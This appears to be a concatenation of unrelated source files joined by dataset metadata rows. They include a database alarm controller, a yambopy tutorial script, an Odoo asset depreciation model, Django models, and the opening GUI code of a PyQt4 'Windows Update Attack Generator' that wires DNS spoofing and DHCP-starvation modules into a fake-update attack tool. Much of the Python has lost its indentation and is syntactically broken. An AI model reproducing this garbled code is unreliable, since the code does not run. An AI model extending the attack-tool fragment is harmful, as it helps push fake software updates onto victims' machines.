send_mail = func.update_send_mail_status(host,db_type,'disk_usage(%s)' %(mounted),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'disk_usage(%s)' %(mounted),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'critical','disk %s usage reach %s' %(mounted,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',3,host,'',create_time,'disk_usage(%s)' %(mounted),used_rate,'critical')
elif int(used_rate_int) >= int(threshold_warning_os_disk):
send_mail = func.update_send_mail_status(host,db_type,'disk_usage(%s)' %(mounted),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'disk_usage(%s)' %(mounted),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'warning','disk %s usage reach %s' %(mounted,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',2,host,'',create_time,'disk_usage(%s)' %(mounted),used_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'disk %s usage ok' %(mounted),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',1,host,'',create_time,'disk_usage','max(%s:%s)' %(mounted,used_rate),'ok')
else:
pass
def get_alarm_os_network():
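    # OS network traffic per interface: in+out bytes compared against
    # thresholds configured in MB and converted to bytes here.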
sql="select a.ip,a.if_descr,a.in_bytes,a.out_bytes,sum(in_bytes+out_bytes) sum_bytes,a.create_time,b.tags,b.alarm_os_network,b.threshold_warning_os_network,b.threshold_critical_os_network,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_net a,db_cfg_os b where a.ip=b.host group by ip,if_descr order by sum(in_bytes+out_bytes) asc;"
result=func.mysql_query(sql)
    if result != 0:
for line in result:
host=line[0]
if_descr=line[1]
in_bytes=line[2]
out_bytes=line[3]
sum_bytes=line[4]
create_time=line[5]
tags=line[6]
alarm_os_network=line[7]
threshold_warning_os_network=(line[8])*1024*1024
threshold_critical_os_network=(line[9])*1024*1024
send_mail=line[10]
send_mail_to_list=line[11]
send_sms=line[12]
send_sms_to_list=line[13]
server_id=0
db_type="os"
port=''
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_os_network)==1:
if int(sum_bytes) >= int(threshold_critical_os_network):
send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)' %(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',3,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical')
elif int(sum_bytes) >= int(threshold_warning_os_network):
send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',2,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'network %s bytes ok' %(if_descr),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',1,host,'',create_time,'network','max(%s-in:%s,out:%s)' %(if_descr,in_bytes,out_bytes),'ok')
else:
pass
def send_alarm():
sql = "select tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,id alarm_id from alarm;"
result=func.mysql_query(sql)
    if result != 0:
send_alarm_mail = func.get_option('send_alarm_mail')
send_alarm_sms = func.get_option('send_alarm_sms')
for line in result:
tags=line[0]
host=line[1]
port=line[2]
create_time=line[3]
db_type=line[4]
alarm_item=line[5]
alarm_value=line[6]
level=line[7]
message=line[8]
send_mail=line[9]
send_mail_to_list=line[10]
send_sms=line[11]
send_sms_to_list=line[12]
alarm_id=line[13]
if port:
server = host+':'+port
else:
server = host
if send_mail_to_list:
mail_to_list=send_mail_to_list.split(';')
else:
send_mail=0
if send_sms_to_list:
sms_to_list=send_sms_to_list.split(';')
else:
send_sms=0
if int(send_alarm_mail)==1:
if send_mail==1:
mail_subject='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
mail_content="""
Type: %s\n<br/>
Tags: %s\n<br/>
Host: %s:%s\n<br/>
Level: %s\n<br/>
Item: %s\n<br/>
Value: %s\n<br/>
Message: %s\n<br/>
""" %(db_type,tags,host,port,level,alarm_item,alarm_value,message)
result = sendmail.send_mail(mail_to_list,mail_subject,mail_content)
if result:
send_mail_status=1
else:
send_mail_status=0
else:
send_mail_status=0
else:
send_mail_status=0
if int(send_alarm_sms)==1:
if send_sms==1:
sms_msg='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
send_sms_type = func.get_option('smstype')
if send_sms_type == 'fetion':
result = sendsms_fx.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
else:
result = sendsms_api.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
if result:
send_sms_status=1
else:
send_sms_status=0
else:
send_sms_status=0
else:
send_sms_status=0
try:
sql="insert into alarm_history(server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,send_mail_status,send_sms_status) select server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,%s,%s from alarm where id=%s;"
param=(send_mail_status,send_sms_status,alarm_id)
func.mysql_exec(sql,param)
            except Exception as e:
                print(e)
func.mysql_exec("delete from alarm",'')
else:
pass
def check_send_alarm_sleep():
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
if send_mail_sleep_time:
        fmt = "%Y-%m-%d %H:%M:%S"
        now_time = time.strftime(fmt, time.localtime())
        result = datetime.datetime(*time.strptime(now_time, fmt)[:6]) - datetime.timedelta(minutes=int(send_mail_sleep_time))
        sleep_alarm_time = result.strftime(fmt)
        sql = "delete from alarm_temp where alarm_type='mail' and create_time <= %s"
        param = (sleep_alarm_time,)
        func.mysql_exec(sql, param)
if send_sms_sleep_time:
        fmt = "%Y-%m-%d %H:%M:%S"
        now_time = time.strftime(fmt, time.localtime())
        result = datetime.datetime(*time.strptime(now_time, fmt)[:6]) - datetime.timedelta(minutes=int(send_sms_sleep_time))
        sleep_alarm_time = result.strftime(fmt)
        sql = "delete from alarm_temp where alarm_type='sms' and create_time <= %s"
        param = (sleep_alarm_time,)
        func.mysql_exec(sql, param)
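# Illustrative computation of the purge cutoff used above (standalone sketch;
# the 30-minute sleep window is a placeholder value):
#   import time, datetime
#   fmt = "%Y-%m-%d %H:%M:%S"
#   now_time = time.strftime(fmt, time.localtime())
#   cutoff = datetime.datetime(*time.strptime(now_time, fmt)[:6]) \
#            - datetime.timedelta(minutes=30)
#   # alarm_temp rows at or before `cutoff` are deleted, re-arming alarms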
def main():
logger.info("alarm controller started.")
check_send_alarm_sleep()
monitor_mysql = func.get_option('monitor_mysql')
monitor_mongodb = func.get_option('monitor_mongodb')
monitor_sqlserver = func.get_option('monitor_sqlserver')
monitor_oracle = func.get_option('monitor_oracle')
monitor_redis = func.get_option('monitor_redis')
monitor_os = func.get_option('monitor_os')
if monitor_mysql=="1":
get_alarm_mysql_status()
get_alarm_mysql_replcation()
if monitor_oracle=="1":
get_alarm_oracle_status()
get_alarm_oracle_tablespace()
get_alarm_oracle_diskgroup()
if monitor_sqlserver=="1":
get_alarm_sqlserver_status()
if monitor_mongodb=="1":
get_alarm_mongodb_status()
if monitor_redis=="1":
get_alarm_redis_status()
if monitor_os=="1":
get_alarm_os_status()
get_alarm_os_disk()
get_alarm_os_network()
send_alarm()
func.update_check_time()
logger.info("alarm controller finished.")
if __name__ == '__main__':
main()
| apache-2.0 | 6,049,866,737,927,612,000 | 68.822222 | 591 | 0.60236 | false | 3.368187 | false | false | false |
alexandremorlet/yambopy | tutorial/bn/ip_bn.py | 5 | 1731 | #
# Author: Henrique Pereira Coutada Miranda
# Run a IP calculation using yambo
#
from __future__ import print_function
import sys
from yambopy import *
from qepy import *
import argparse
#parse options
parser = argparse.ArgumentParser(description='Test the yambopy script.')
parser.add_argument('-dg','--doublegrid', action="store_true", help='Use double grid')
parser.add_argument('-c', '--calc', action="store_true", help='calculate the IP absorption')
parser.add_argument('-p', '--plot', action="store_true", help='plot the results')
args = parser.parse_args()
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
yambo = "yambo"
folder = 'ip'
#check if the SAVE folder is present
if not os.path.isdir('database/SAVE'):
print('preparing yambo database')
os.system('mkdir -p database')
os.system('cd nscf/bn.save; p2y > p2y.log')
os.system('cd nscf/bn.save; yambo > yambo.log')
os.system('mv nscf/bn.save/SAVE database')
if not os.path.isdir(folder):
os.mkdir(folder)
os.system('cp -r database/SAVE %s'%folder)
#initialize the double grid
if args.doublegrid:
print("creating double grid")
f = open('%s/ypp.in'%folder,'w')
f.write("""kpts_map
%DbGd_DB1_paths
"../database_double"
%""")
f.close()
os.system('cd %s; ypp'%folder)
if args.calc:
#create the yambo input file
y = YamboIn('yambo -o g -V all',folder=folder)
y['FFTGvecs'] = [30,'Ry']
y['BndsRnXs'] = [1,30]
y['QpntsRXd'] = [[1,1],'']
y['ETStpsXd'] = 500
y.write('%s/yambo_run.in'%folder)
print('running yambo')
os.system('cd %s; %s -F yambo_run.in -J yambo'%(folder,yambo))
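    # Illustrative meaning of the variables set above, following standard
    # yambo input conventions: FFTGvecs is the FFT G-vector cutoff in Ry,
    # BndsRnXs the band range entering the response, QpntsRXd the q-point
    # range, and ETStpsXd the number of energy steps in the spectrum.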
if args.plot:
#pack in a json file
y = YamboOut(folder)
y.pack()
| bsd-3-clause | 1,098,429,898,352,932,600 | 25.630769 | 92 | 0.645292 | false | 2.823817 | false | true | false |
OCA/l10n-italy | assets_management/models/asset_depreciation.py | 1 | 21256 | # Author(s): Silvio Gregorini ([email protected])
# Copyright 2019 Openforce Srls Unipersonale (www.openforce.it)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
from odoo.tools import float_compare, float_is_zero
class AssetDepreciation(models.Model):
_name = 'asset.depreciation'
_description = "Assets Depreciations"
amount_depreciable = fields.Monetary(
string="Depreciable Amount"
)
amount_depreciable_updated = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Updated Amount",
)
amount_depreciated = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Depreciated Amount",
)
amount_gain = fields.Monetary(
compute='_compute_amounts',
string="Capital Gain",
store=True,
)
amount_historical = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Historical Amount",
)
amount_in = fields.Monetary(
compute='_compute_amounts',
store=True,
string="In Amount",
)
amount_loss = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Capital Loss",
)
amount_out = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Out Amount",
)
amount_residual = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Residual Amount",
)
asset_id = fields.Many2one(
'asset.asset',
ondelete='cascade',
readonly=True,
required=True,
string="Asset",
)
base_coeff = fields.Float(
default=1,
help="Coeff to compute amount depreciable from purchase amount",
string="Depreciable Base Coeff",
)
company_id = fields.Many2one(
'res.company',
readonly=True,
related='asset_id.company_id',
string="Company"
)
currency_id = fields.Many2one(
'res.currency',
readonly=True,
related='asset_id.currency_id',
string="Currency"
)
date_start = fields.Date(
string="Date Start"
)
dismiss_move_id = fields.Many2one(
'account.move',
string="Dismiss Move"
)
first_dep_nr = fields.Integer(
default=1,
string="First Dep. Num",
)
force_all_dep_nr = fields.Boolean(
string="Force All Dep. Num"
)
force_first_dep_nr = fields.Boolean(
string="Force First Dep. Num"
)
last_depreciation_date = fields.Date(
compute='_compute_last_depreciation_date',
store=True,
string="Last Dep.",
)
line_ids = fields.One2many(
'asset.depreciation.line',
'depreciation_id',
string="Lines"
)
mode_id = fields.Many2one(
'asset.depreciation.mode',
required=True,
string="Mode",
)
percentage = fields.Float(
string="Depreciation (%)"
)
pro_rata_temporis = fields.Boolean(
string="Pro-rata Temporis"
)
requires_account_move = fields.Boolean(
readonly=True,
related='type_id.requires_account_move',
string="Requires Account Move",
)
state = fields.Selection(
[('non_depreciated', "Non Depreciated"),
('partially_depreciated', "Partially Depreciated"),
('totally_depreciated', "Depreciated")],
compute='_compute_state',
default='non_depreciated',
store=True,
string="State"
)
type_id = fields.Many2one(
'asset.depreciation.type',
string="Depreciation Type"
)
zero_depreciation_until = fields.Date(
string="Zero Depreciation Up To"
)
@api.model
def create(self, vals):
dep = super().create(vals)
dep.normalize_first_dep_nr()
if dep.line_ids:
num_lines = dep.line_ids.filtered('requires_depreciation_nr')
if num_lines:
num_lines.normalize_depreciation_nr()
return dep
@api.multi
def write(self, vals):
res = super().write(vals)
need_norm = self.filtered(lambda d: d.need_normalize_first_dep_nr())
if need_norm:
need_norm.normalize_first_dep_nr(force=True)
for dep in self:
num_lines = dep.line_ids.filtered('requires_depreciation_nr')
if num_lines and num_lines.need_normalize_depreciation_nr():
num_lines.normalize_depreciation_nr(force=True)
return res
@api.multi
def unlink(self):
if self.mapped('line_ids'):
raise ValidationError(
_("Cannot delete depreciations if there is any depreciation"
" line linked to it.")
)
if any([m.state != 'draft' for m in self.mapped('dismiss_move_id')]):
deps = self.filtered(
lambda l: l.dismiss_move_id
and l.dismiss_move_id.state != 'draft'
)
name_list = "\n".join([l[-1] for l in deps.name_get()])
raise ValidationError(
_("Following lines are linked to posted account moves, and"
" cannot be deleted:\n{}").format(name_list)
)
return super().unlink()
@api.multi
def name_get(self):
return [(dep.id, dep.make_name()) for dep in self]
@api.multi
@api.depends(
'amount_depreciable', 'amount_depreciable_updated', 'amount_residual'
)
def _compute_state(self):
for dep in self:
dep.state = dep.get_depreciation_state()
@api.onchange('asset_id', 'base_coeff')
def onchange_base_coeff(self):
purchase_amount = self.asset_id.purchase_amount
self.amount_depreciable = self.base_coeff * purchase_amount
@api.onchange('first_dep_nr')
def onchange_normalize_first_dep_nr(self):
if self.first_dep_nr <= 0:
self.first_dep_nr = 1
@api.onchange('force_all_dep_nr')
def onchange_force_all_dep_nr(self):
if self.force_all_dep_nr:
self.first_dep_nr = 1
@api.onchange('force_first_dep_nr')
def onchange_force_first_dep_nr(self):
if self.force_first_dep_nr and self.first_dep_nr <= 0:
self.first_dep_nr = 1
@api.onchange('force_all_dep_nr', 'force_first_dep_nr')
def onchange_force_dep_nrs(self):
if self.force_all_dep_nr and self.force_first_dep_nr:
self.force_all_dep_nr = False
self.force_first_dep_nr = False
title = _("Warning!")
msg = _(
"Fields `Force All Dep. Num` and `Force First Dep. Num`"
" cannot be both active."
)
return {'warning': {'title': title, 'message': msg}}
if not self.force_all_dep_nr and self.force_first_dep_nr:
self.first_dep_nr = 1
@api.multi
@api.depends('amount_depreciable',
'line_ids.amount',
'line_ids.balance',
'line_ids.move_type',
'asset_id.sold')
def _compute_amounts(self):
for dep in self:
vals = dep.get_computed_amounts()
dep.update(vals)
@api.multi
@api.depends('line_ids', 'line_ids.date', 'line_ids.move_type')
def _compute_last_depreciation_date(self):
"""
Update date upon deps with at least one depreciation line (excluding
partial dismissal); else set field to False
"""
for dep in self:
dep_lines = dep.line_ids.filtered(
lambda l: l.move_type == 'depreciated'
and not l.partial_dismissal
)
if dep_lines:
dep.last_depreciation_date = max(dep_lines.mapped('date'))
else:
dep.last_depreciation_date = False
def check_before_generate_depreciation_lines(self, dep_date):
# Check if self is a valid recordset
if not self:
raise ValidationError(
_("Cannot create any depreciation according to current"
" settings.")
)
lines = self.mapped('line_ids')
# Check if any depreciation already has newer depreciation lines
# than the given date
newer_lines = lines.filtered(
lambda l: l.move_type == 'depreciated'
and not l.partial_dismissal
and l.date > dep_date
)
if newer_lines:
asset_names = ', '.join([
asset_name for asset_id, asset_name in
newer_lines.mapped('depreciation_id.asset_id').name_get()
])
raise ValidationError(
_("Cannot update the following assets which contain"
" newer depreciations for the chosen types:\n{}")
.format(asset_names)
)
posted_lines = lines.filtered(
lambda l: l.date == dep_date
and l.move_id
and l.move_id.state != 'draft'
)
if posted_lines:
posted_names = ', '.join([
asset_name for asset_id, asset_name in
posted_lines.mapped('depreciation_id.asset_id').name_get()
])
raise ValidationError(
_("Cannot update the following assets which contain"
" posted depreciation for the chosen date and types:\n{}")
.format(posted_names)
)
def generate_depreciation_lines(self, dep_date):
# Set new date within context if necessary
self.check_before_generate_depreciation_lines(dep_date)
new_lines = self.env['asset.depreciation.line']
for dep in self:
new_lines |= dep.generate_depreciation_lines_single(dep_date)
return new_lines
def generate_depreciation_lines_single(self, dep_date):
self.ensure_one()
dep_nr = self.get_max_depreciation_nr() + 1
dep = self.with_context(dep_nr=dep_nr, used_asset=self.asset_id.used)
dep_amount = dep.get_depreciation_amount(dep_date)
dep = dep.with_context(dep_amount=dep_amount)
vals = dep.prepare_depreciation_line_vals(dep_date)
return self.env['asset.depreciation.line'].create(vals)
def generate_dismiss_account_move(self):
self.ensure_one()
am_obj = self.env['account.move']
vals = self.get_dismiss_account_move_vals()
if 'line_ids' not in vals:
vals['line_ids'] = []
line_vals = self.get_dismiss_account_move_line_vals()
for v in line_vals:
vals['line_ids'].append((0, 0, v))
self.dismiss_move_id = am_obj.create(vals)
def get_computed_amounts(self):
self.ensure_one()
vals = {
'amount_{}'.format(k): abs(v)
for k, v in self.line_ids.get_balances_grouped().items()
if 'amount_{}'.format(k) in self._fields
}
if self.asset_id.sold:
vals.update({
'amount_depreciable_updated': 0,
'amount_residual': 0
})
else:
non_residual_types = self.line_ids.get_non_residual_move_types()
update_move_types = self.line_ids.get_update_move_types()
amt_dep = self.amount_depreciable
vals.update({
'amount_depreciable_updated': amt_dep + sum([
l.balance for l in self.line_ids
if l.move_type in update_move_types
]),
'amount_residual': amt_dep + sum([
l.balance for l in self.line_ids
if l.move_type not in non_residual_types
])
})
return vals
def get_depreciable_amount(self, dep_date=None):
types = self.line_ids.get_update_move_types()
return self.amount_depreciable + sum([
l.balance for l in self.line_ids
if l.move_type in types and (not dep_date or l.date <= dep_date)
])
def get_depreciation_amount(self, dep_date):
self.ensure_one()
zero_dep_date = self.zero_depreciation_until
if zero_dep_date and dep_date <= zero_dep_date:
return 0
# Get depreciable amount, multiplier and digits
amount = self.get_depreciable_amount(dep_date)
multiplier = self.get_depreciation_amount_multiplier(dep_date)
digits = self.env['decimal.precision'].precision_get('Account')
dep_amount = round(amount * multiplier, digits)
# If amount_residual < dep_amount: use amount_residual as dep_amount
if float_compare(self.amount_residual, dep_amount, digits) < 0:
dep_amount = self.amount_residual
return dep_amount
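    # Worked example (illustrative figures): with a depreciable base of
    # 10000.0, percentage 20 (multiplier 0.2) and a residual of 1500.0,
    # round(10000.0 * 0.2, 2) = 2000.0 exceeds the residual, so the method
    # returns 1500.0 instead.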
def get_depreciation_amount_multiplier(self, dep_date):
self.ensure_one()
# Base multiplier
multiplier = self.percentage / 100
# Update multiplier from depreciation mode data
multiplier *= self.mode_id.get_depreciation_amount_multiplier()
# Update multiplier from pro-rata temporis
date_start = self.date_start
if dep_date < date_start:
dt_start_str = fields.Date.from_string(date_start).strftime(
'%d-%m-%Y'
)
raise ValidationError(
_("Depreciations cannot start before {}.").format(dt_start_str)
)
if self.pro_rata_temporis or self._context.get('force_prorata'):
fiscal_year_obj = self.env['account.fiscal.year']
fy_start = fiscal_year_obj.get_fiscal_year_by_date(
date_start, company=self.company_id
)
fy_dep = fiscal_year_obj.get_fiscal_year_by_date(
dep_date, company=self.company_id
)
if fy_dep == fy_start:
# If current depreciation lies within the same fiscal year in
# which the asset was registered, compute multiplier as a
# difference from date_dep multiplier and start_date
# multiplier, plus 1/lapse to avoid "skipping" one day
fy_end = fields.Date.from_string(fy_dep.date_to)
fy_start = fields.Date.from_string(fy_dep.date_from)
lapse = (fy_end - fy_start).days + 1
dep_multiplier = self.get_pro_rata_temporis_multiplier(
dep_date, 'dte'
)
start_multiplier = self.get_pro_rata_temporis_multiplier(
self.date_start, 'dte'
)
multiplier *= start_multiplier - dep_multiplier + 1 / lapse
else:
# Otherwise, simply compute multiplier with respect to how
# many days have passed since the beginning of the fiscal year
multiplier *= self.get_pro_rata_temporis_multiplier(
dep_date, 'std'
)
return multiplier
def get_depreciation_state(self):
self.ensure_one()
digits = self.env['decimal.precision'].precision_get('Account')
depreciable = self.amount_depreciable
residual = self.amount_residual
updated = self.amount_depreciable_updated
if float_is_zero(depreciable, digits):
return 'non_depreciated'
elif float_is_zero(residual, digits):
return 'totally_depreciated'
elif float_compare(residual, updated, digits) < 0:
return 'partially_depreciated'
else:
return 'non_depreciated'
def get_dismiss_account_move_line_vals(self):
self.ensure_one()
credit_line_vals = {
'account_id': self.asset_id.category_id.asset_account_id.id,
'credit': self.amount_depreciated,
'debit': 0.0,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
debit_line_vals = {
'account_id': self.asset_id.category_id.fund_account_id.id,
'credit': 0.0,
'debit': self.amount_depreciated,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
return [credit_line_vals, debit_line_vals]
def get_dismiss_account_move_vals(self):
self.ensure_one()
return {
'company_id': self.company_id.id,
'date': self.asset_id.sale_date,
'journal_id': self.asset_id.category_id.journal_id.id,
'line_ids': [],
'ref': _("Asset dismissal: ") + self.asset_id.make_name(),
}
def get_max_depreciation_nr(self):
self.ensure_one()
num_lines = self.line_ids.filtered('requires_depreciation_nr')
nums = num_lines.mapped('depreciation_nr')
if not nums:
nums = [0]
return max(nums)
def get_pro_rata_temporis_dates(self, date):
"""
Gets useful dates for pro rata temporis computations, according to
given date, by retrieving its fiscal year.
:param date: given date for depreciation
:return: date objects triplet (dt_start, dt, dt_end)
- dt_start: fiscal year first day
- dt: given date
- dt_end: fiscal year last day
"""
if not date:
raise ValidationError(
_("Cannot compute pro rata temporis for unknown date.")
)
fiscal_year_obj = self.env['account.fiscal.year']
fiscal_year = fiscal_year_obj.get_fiscal_year_by_date(
date, company=self.company_id
)
if not fiscal_year:
date_str = fields.Date.from_string(date).strftime('%d/%m/%Y')
raise ValidationError(
_("No fiscal year defined for date {}") + date_str
)
return (
fields.Date.from_string(fiscal_year.date_from),
fields.Date.from_string(date),
fields.Date.from_string(fiscal_year.date_to)
)
def get_pro_rata_temporis_multiplier(self, date=None, mode='std'):
"""
Computes and returns pro rata temporis multiplier according to given
depreciation, date, fiscal year and mode
:param date: given date as a fields.Date string
:param mode: string, defines how to compute multiplier. Valid values:
- 'std': start-to-date, computes multiplier using days from fiscal
year's first day to given date;
- 'dte': date-to-end, computes multiplier using days from given
date to fiscal year's last day
"""
self.ensure_one()
if not (self.pro_rata_temporis or self._context.get('force_prorata')):
return 1
dt_start, dt, dt_end = self.get_pro_rata_temporis_dates(date)
lapse = (dt_end - dt_start).days + 1
if mode == 'std':
return ((dt - dt_start).days + 1) / lapse
elif mode == 'dte':
return ((dt_end - dt).days + 1) / lapse
elif mode:
raise NotImplementedError(
_("Cannot get pro rata temporis multiplier for mode `{}`")
.format(mode)
)
raise NotImplementedError(
_("Cannot get pro rata temporis multiplier for unspecified mode")
)
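    # Worked example (illustrative): for a 365-day calendar fiscal year and
    # date 2019-07-01 (day 182 of the year):
    #   'std' -> 182 / 365 ~= 0.4986   (fiscal year start to date)
    #   'dte' -> 184 / 365 ~= 0.5041   (date to fiscal year end)
    # Both windows count the given day itself, which is why
    # get_depreciation_amount_multiplier() adds 1 / lapse when it takes the
    # difference of two 'dte' multipliers.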
def make_name(self):
self.ensure_one()
return " - ".join((self.asset_id.make_name(), self.type_id.name or ""))
def need_normalize_first_dep_nr(self):
self.ensure_one()
if self.force_all_dep_nr:
return False
if self.force_first_dep_nr:
if self.first_dep_nr <= 0:
return True
else:
if self.first_dep_nr != 1:
return True
return False
def normalize_first_dep_nr(self, force=False):
"""
Normalize first numbered line according to `first_dep_nr` value
:param force: if True, force normalization
"""
force = force or self._context.get('force_normalize_first_dep_nr')
for d in self:
if force or d.need_normalize_first_dep_nr():
d.onchange_normalize_first_dep_nr()
def post_generate_depreciation_lines(self, lines=None):
lines = lines or self.env['asset.depreciation.line']
lines.filtered('requires_account_move').button_generate_account_move()
def prepare_depreciation_line_vals(self, dep_date):
self.ensure_one()
if dep_date is None:
raise ValidationError(
_("Cannot create a depreciation line without a date")
)
dep_amount = self._context.get('dep_amount') or 0.0
dep_year = fields.Date.from_string(dep_date).year
return {
'amount': dep_amount,
'date': dep_date,
'depreciation_id': self.id,
'move_type': 'depreciated',
'name': _("{} - Depreciation").format(dep_year)
}
| agpl-3.0 | 560,865,373,787,391,300 | 32.845541 | 79 | 0.563867 | false | 3.890719 | false | false | false |
Fakor/congov | web/engine_integration/models.py | 1 | 1444 | from django.db import models
class Blueprint(models.Model):
name = models.CharField(max_length=30)
class MineBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class FactoryBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class ResourceType(models.Model):
name = models.CharField(max_length=30, unique=True)
requirements = models.ForeignKey('Resources', blank=True, null=True)
def __str__(self):
return self.name
class Mine(models.Model):
name = models.CharField(max_length=30, unique=True)
all_resources = models.ForeignKey('Resources')
coordinates = models.ForeignKey('Coordinates')
blueprint = models.IntegerField()
production_level = models.FloatField()
def __str__(self):
return self.name
class Coordinates(models.Model):
x = models.FloatField()
y = models.FloatField()
class Resource(models.Model):
amount = models.FloatField()
resource_type = models.ForeignKey('ResourceType')
class Resources(models.Model):
all_resources = models.ManyToManyField('Resource')
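# Illustrative ORM usage (sketch; assumes migrations are applied, and every
# value below is a placeholder):
#   coords = Coordinates.objects.create(x=1.0, y=2.0)
#   resources = Resources.objects.create()
#   Mine.objects.create(name="North Pit", all_resources=resources,
#                       coordinates=coords, blueprint=1, production_level=0.5)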
| mit | 5,290,383,118,267,450,000 | 27.88 | 72 | 0.695291 | false | 3.913279 | false | false | false |
stevenliuit/3vilTwinAttacker | Modules/AttackUp.py | 1 | 9722 | from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Modules.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from Core.Settings import frm_Settings
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_start = QPushButton("Start DNS",self)
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_start.setFixedHeight(50)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_start.setIcon(QIcon("rsc/start.png"))
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_start.clicked.connect(self.dns_start)
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
